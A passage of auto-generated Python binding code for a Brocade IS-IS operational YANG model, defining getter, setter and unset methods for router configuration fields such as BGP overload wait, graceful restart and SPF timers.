Getter method for overload_wait_on_bgp, mapped from YANG variable /isis_state/router_isis_config/overload_wait_on_bgp (isis-status)
YANG Description: If IS to wait in overload-state temporarity till BGP converges on reboot
"""
return self.__overload_wait_on_bgp
def _set_overload_wait_on_bgp(self, v, load=False):
"""
Setter method for overload_wait_on_bgp, mapped from YANG variable /isis_state/router_isis_config/overload_wait_on_bgp (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_wait_on_bgp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_overload_wait_on_bgp() directly.
YANG Description: If IS to wait in overload-state temporarity till BGP converges on reboot
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_wait_on_bgp must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__overload_wait_on_bgp = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_wait_on_bgp(self):
self.__overload_wait_on_bgp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_overload_bgp_wait_time(self):
"""
Getter method for overload_bgp_wait_time, mapped from YANG variable /isis_state/router_isis_config/overload_bgp_wait_time (uint32)
YANG Description: Maximum time in seconds to wait for BGP convergence
"""
return self.__overload_bgp_wait_time
def _set_overload_bgp_wait_time(self, v, load=False):
"""
Setter method for overload_bgp_wait_time, mapped from YANG variable /isis_state/router_isis_config/overload_bgp_wait_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_bgp_wait_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_overload_bgp_wait_time() directly.
YANG Description: Maximum time in seconds to wait for BGP convergence
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_bgp_wait_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)""",
})
self.__overload_bgp_wait_time = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_bgp_wait_time(self):
self.__overload_bgp_wait_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
def _get_enable_code_assertions(self):
"""
Getter method for enable_code_assertions, mapped from YANG variable /isis_state/router_isis_config/enable_code_assertions (isis-status)
YANG Description: Enable code-assertions
"""
return self.__enable_code_assertions
def _set_enable_code_assertions(self, v, load=False):
"""
Setter method for enable_code_assertions, mapped from YANG variable /isis_state/router_isis_config/enable_code_assertions (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_enable_code_assertions is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enable_code_assertions() directly.
YANG Description: Enable code-assertions
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enable_code_assertions must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__enable_code_assertions = t
if hasattr(self, '_set'):
self._set()
def _unset_enable_code_assertions(self):
self.__enable_code_assertions = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_graceful_restart_helper(self):
"""
Getter method for graceful_restart_helper, mapped from YANG variable /isis_state/router_isis_config/graceful_restart_helper (isis-status)
YANG Description: Enable graceful restart helper support
"""
return self.__graceful_restart_helper
def _set_graceful_restart_helper(self, v, load=False):
"""
Setter method for graceful_restart_helper, mapped from YANG variable /isis_state/router_isis_config/graceful_restart_helper (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_graceful_restart_helper is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_graceful_restart_helper() directly.
YANG Description: Enable graceful restart helper support
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """graceful_restart_helper must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__graceful_restart_helper = t
if hasattr(self, '_set'):
self._set()
def _unset_graceful_restart_helper(self):
self.__graceful_restart_helper = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_isis_hostname_enabled(self):
"""
Getter method for isis_hostname_enabled, mapped from YANG variable /isis_state/router_isis_config/isis_hostname_enabled (isis-status)
YANG Description: If IS-IS Hostname enabled
"""
return self.__isis_hostname_enabled
def _set_isis_hostname_enabled(self, v, load=False):
"""
Setter method for isis_hostname_enabled, mapped from YANG variable /isis_state/router_isis_config/isis_hostname_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_isis_hostname_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_isis_hostname_enabled() directly.
YANG Description: If IS-IS Hostname enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """isis_hostname_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__isis_hostname_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_isis_hostname_enabled(self):
self.__isis_hostname_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_isis_system_info(self):
"""
Getter method for isis_system_info, mapped from YANG variable /isis_state/router_isis_config/isis_system_info (container)
YANG Description: information specific to a single instance of IS-IS protocol running on a router
"""
return self.__isis_system_info
def _set_isis_system_info(self, v, load=False):
"""
Setter method for isis_system_info, mapped from YANG variable /isis_state/router_isis_config/isis_system_info (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_isis_system_info is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_isis_system_info() directly.
YANG Description: information specific to a single instance of IS-IS protocol running on a router
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """isis_system_info must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__isis_system_info = t
if hasattr(self, '_set'):
self._set()
def _unset_isis_system_info(self):
self.__isis_system_info = YANGDynClass(base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_log_handler(self):
"""
Getter method for log_handler, mapped from YANG variable /isis_state/router_isis_config/log_handler (container)
YANG Description: IS-IS logging handler
"""
return self.__log_handler
def _set_log_handler(self, v, load=False):
"""
Setter method for log_handler, mapped from YANG variable /isis_state/router_isis_config/log_handler (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_log_handler is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_log_handler() directly.
YANG Description: IS-IS logging handler
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """log_handler must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__log_handler = t
if hasattr(self, '_set'):
self._set()
def _unset_log_handler(self):
self.__log_handler = YANGDynClass(base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_is_address_family_v4(self):
"""
Getter method for is_address_family_v4, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v4 (container)
YANG Description: ISIS ipv4 address family
"""
return self.__is_address_family_v4
def _set_is_address_family_v4(self, v, load=False):
"""
Setter method for is_address_family_v4, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v4 (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_is_address_family_v4 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_is_address_family_v4() directly.
YANG Description: ISIS ipv4 address family
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """is_address_family_v4 must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__is_address_family_v4 = t
if hasattr(self, '_set'):
self._set()
def _unset_is_address_family_v4(self):
self.__is_address_family_v4 = YANGDynClass(base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_is_address_family_v6(self):
"""
Getter method for is_address_family_v6, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v6 (container)
YANG Description: ISIS ipv6 address family
"""
return self.__is_address_family_v6
def _set_is_address_family_v6(self, v, load=False):
"""
Setter method for is_address_family_v6, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v6 (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_is_address_family_v6 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_is_address_family_v6() directly.
YANG Description: ISIS ipv6 address family
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """is_address_family_v6 must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__is_address_family_v6 = t
if hasattr(self, '_set'):
self._set()
def _unset_is_address_family_v6(self):
self.__is_address_family_v6 = YANGDynClass(base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_reverse_metric(self):
"""
Getter method for reverse_metric, mapped from YANG variable /isis_state/router_isis_config/reverse_metric (container)
YANG Description: IS-IS system level reverse-metric configuration
"""
return self.__reverse_metric
def _set_reverse_metric(self, v, load=False):
"""
Setter method for reverse_metric, mapped from YANG variable /isis_state/router_isis_config/reverse_metric (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_reverse_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reverse_metric() directly.
YANG Description: IS-IS system level reverse-metric configuration
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """reverse_metric must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__reverse_metric = t
if hasattr(self, '_set'):
self._set()
def _unset_reverse_metric(self):
self.__reverse_metric = YANGDynClass(base=reverse_metric.reverse_metric, is_container='container', presence=False, yang_name="reverse-metric", rest_name="reverse-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-reverse-metric-global', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_debug_handler(self):
"""
Getter method for debug_handler, mapped from YANG variable /isis_state/router_isis_config/debug_handler (container)
YANG Description: IS-IS debug handler
"""
return self.__debug_handler
def _set_debug_handler(self, v, load=False):
"""
Setter method for debug_handler, mapped from YANG variable /isis_state/router_isis_config/debug_handler (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_debug_handler is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_debug_handler() directly.
YANG Description: IS-IS debug handler
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """debug_handler must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__debug_handler = t
if hasattr(self, '_set'):
self._set()
def _unset_debug_handler(self):
self.__debug_handler = YANGDynClass(base=debug_handler.debug_handler, is_container='container', presence=False, yang_name="debug-handler", rest_name="debug-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-debugger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l1_auth_profile(self):
"""
Getter method for l1_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l1_auth_profile (container)
"""
return self.__l1_auth_profile
def _set_l1_auth_profile(self, v, load=False):
"""
Setter method for l1_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l1_auth_profile (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l1_auth_profile is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l1_auth_profile() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l1_auth_profile must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l1_auth_profile = t
if hasattr(self, '_set'):
self._set()
def _unset_l1_auth_profile(self):
self.__l1_auth_profile = YANGDynClass(base=l1_auth_profile.l1_auth_profile, is_container='container', presence=False, yang_name="l1-auth-profile", rest_name="l1-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l1-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l2_auth_profile(self):
"""
Getter method for l2_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l2_auth_profile (container)
"""
return self.__l2_auth_profile
def _set_l2_auth_profile(self, v, load=False):
"""
Setter method for l2_auth_profile, mapped from YANG variable /isis_state/router_isis_config/l2_auth_profile (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l2_auth_profile is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l2_auth_profile() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l2_auth_profile must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l2_auth_profile = t
if hasattr(self, '_set'):
self._set()
def _unset_l2_auth_profile(self):
self.__l2_auth_profile = YANGDynClass(base=l2_auth_profile.l2_auth_profile, is_container='container', presence=False, yang_name="l2-auth-profile", rest_name="l2-auth-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-authentication-profile-l2-auth-profile-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l1_spf_timer(self):
"""
Getter method for l1_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf_timer (container)
"""
return self.__l1_spf_timer
def _set_l1_spf_timer(self, v, load=False):
"""
Setter method for l1_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l1_spf_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l1_spf_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l1_spf_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """l1_spf_timer must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__l1_spf_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_l1_spf_timer(self):
self.__l1_spf_timer = YANGDynClass(base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_l2_spf_timer(self):
"""
Getter method for l2_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf_timer (container)
"""
return self.__l2_spf_timer
def _set_l2_spf_timer(self, v, load=False):
"""
Setter method for l2_spf_timer, mapped from YANG variable /isis_state/router_isis_config/l2_spf_timer (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_l2_spf_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_l2_spf_timer() directly.
"""
if hasattr(v, "_utype"):
